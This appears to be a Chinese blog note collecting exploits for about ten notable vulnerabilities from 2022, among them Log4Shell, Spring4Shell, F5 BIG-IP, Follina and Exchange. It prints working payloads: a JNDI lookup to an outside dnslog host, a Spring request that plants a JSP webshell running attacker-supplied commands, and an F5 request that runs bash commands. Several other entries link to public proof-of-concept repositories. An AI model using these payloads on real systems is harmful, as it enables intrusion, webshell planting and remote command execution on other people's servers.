2022 top 10漏洞

前言

发现top10居然有好几个我没遇到过，这不得记录一下。

exp

CVE-2021-44228 log4j远程代码执行

基础payload:${jndi:ldap://ky28eo.dnslog.cn}

CVE-2022-30190

看了下复现的文章，这是一个office的远程代码执行漏洞，poc见：https://github.com/JohnHammond/msdt-follina

CVE-2022-22965

spring的一个洞，限制比较多，poc如下：

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host:x.x.x.x
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1

CVE-2022-0609

chrome漏洞，无poc，可以参考先知的分析文章

F5 BIGIP认证绕过 CVE-2022-1388

poc

POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
Authorization: Basic YWRtaW46
X-F5-Auth-Token: a
Connection: X-F5-Auth-Token
Content-type: application/json
Content-Length: 41

{"command":"run", "utilCmdArgs": "-c id"}

CVE-2017-11882

这个 Office RCE 漏洞非常经典，在当时是通杀所有 Office 版本的。poc：https://github.com/Ridter/CVE-2017-11882

CVE-2022-41040 && CVE-2022-41082

CVE-2022-41040 Microsoft Exchange Server权限提升漏洞
CVE-2022-41082 Microsoft Exchange Server 远程执行代码漏洞

poc :https://github.com/CronUp/Vulnerabilidades

CVE-2022-27925 && CVE-2022-41352

1. https://github.com/vnhacker1337/CVE-2022-27925-PoC

2. https://github.com/Cr4ckC4t/cve-2022-41352-zimbra-rce

CVE-2022-26134

https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL

CVE-2022-30525

https://github.com/Henry4E36/CVE-2022-30525

参考文章

• https://www.cnblogs.com/loongten/p/15822195.html
• https://paper.seebug.org/1915/
• https://blog.csdn.net/qq_45894840/article/details/125200463
• https://www.cnblogs.com/cute-puli/p/16329332.html
• https://xz.aliyun.com/t/11121
• https://xz.aliyun.com/t/11418
• https://www.sqlsec.com/2020/10/office.html
• https://www.cnblogs.com/dnoir/p/microsoft-exchange-server-cve202241040--cve2022410.html
• https://www.yang99.top/index.php/archives/82/
• https://zgao.top/cve-2022-26134-confluence-ognl%E6%B3%A8%E5%85%A5%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/
• https://zgao.top/cve-2022-30525-zyxel-firewalls-ztp-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/